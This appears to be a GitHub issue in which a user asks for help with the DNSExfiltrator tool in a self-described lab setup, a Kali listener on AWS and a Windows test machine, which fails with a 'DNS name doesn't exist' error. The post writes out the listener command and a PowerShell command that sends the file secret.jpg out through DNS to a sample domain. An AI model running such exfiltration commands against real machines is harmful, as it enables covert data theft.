DNSExfiltrator copied to clipboard
DNS name doesn't exist issue
Hi, I am really appreciate that you create such tools so that I could test DNS security. I have downloaded this file and have kind of issue.
I also have seen of same issue in this github page.
However, I really don't know how to solve this.
Here is my environment:
- My attacking environment kali is on AWS EC2.
- I use route 53 to manage my domain abc.shop(abc.shop is sample)
- so my NS records should be "ns-xxx.awsdns-xxx.com" something like this
- I connect my domain abc.shop to my kali 53.x.x.x
- I used "python2 dnsexfiltrator.py -d abc.shop -p password" on my kali(53.x.x.x) It can be on listening status.
- My victim machine is window and it is on my exsi server (172.X.X.X)
- I have used such command on window powershell. "Invoke-DNSExfiltrator -i secret.jpg -d abc.shop -p password" and it says DNS name doesn't exist.
My question is this: Did I configure something wrong? Do I have to own a Name server of NS record? (because I don't own the name server but AWS own it) Thank you for your effort, Best regards.